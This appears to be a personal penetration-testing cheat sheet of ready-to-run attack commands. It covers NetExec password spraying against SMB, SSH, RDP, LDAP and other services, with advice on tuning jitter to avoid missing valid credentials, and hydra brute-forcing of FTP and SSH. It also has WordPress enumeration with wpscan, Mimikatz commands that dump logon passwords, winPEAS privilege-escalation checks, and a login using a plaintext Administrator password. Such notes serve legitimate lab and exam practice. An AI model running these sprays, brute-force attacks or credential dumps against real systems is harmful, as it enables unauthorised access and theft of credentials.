Random useful stuff

NXC

If you have a list of users and passwords and want to spray against a service (check nmap to see what services are available).

nxc smb targets.txt -u users.txt -p passwords.txt
nxc ssh targets.txt -u users.txt -p passwords.txt  
nxc ldap targets.txt -u users.txt -p passwords.txt
nxc ftp targets.txt -u users.txt -p passwords.txt
nxc wmi targets.txt -u users.txt -p passwords.txt
nxc winrm targets.txt -u users.txt -p passwords.txt
nxc rdp targets.txt -u users.txt -p passwords.txt
nxc vnc targets.txt -u users.txt -p passwords.txt
nxc mssql targets.txt -u users.txt -p passwords.txt
nxc nfs targets.txt -u users.txt -p passwords.txt

If you get errors such as this when spraying:

[06:55:00] ERROR    Internal Paramiko error for Admin:root, Error reading SSH protocol banner[Errno 104] Connection reset by peer                  ssh.py:234
SSH         192.168.113.153 22     192.168.113.153  [-] root:root
[06:55:04] ERROR    Internal Paramiko error for sarah:root, Error reading SSH protocol banner[Errno 104] Connection reset by peer                  ssh.py:234

You might miss valid credentials if it errors on the correct ones (I’ve tested this). You can add jitter and decrease the threads in that case, play around with the jitter as you might not need it to be so long between each attempt:

nxc ssh 192.168.113.153 -u users.txt -p pass.txt --jitter 10-20 -t 1

To connect with Administrator you need to pass –local-auth flag. When spraying with a user list against a password or hash, its worth just putting local-auth if youre going to include Administrator as a user.

proxychains nxc smb 10.10.206.154 -u Administrator -p hghgib6vHT3bVWf --local-auth

Bruteforce ftp:

hydra -L users.txt -P /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt 192.168.79.46 ftp –V -f

Password Bruteforce SSH:

hydra -L users.txt -P pass.txt -e nsr -q ssh://192.168.120.85 -t 4 -w 5 -f

Wordpress:

wpscan --url http://192.168.192.174 --enumerate p --enumerate t --enumerate -u -v

Mimikatz:

privilege::debug
sekurlsa::logonpasswords

Winpeas:

Run all checks while avoiding time-consuming searches:

.\winPEASany.exe quiet cmd fast

Display currently running processes

tasklist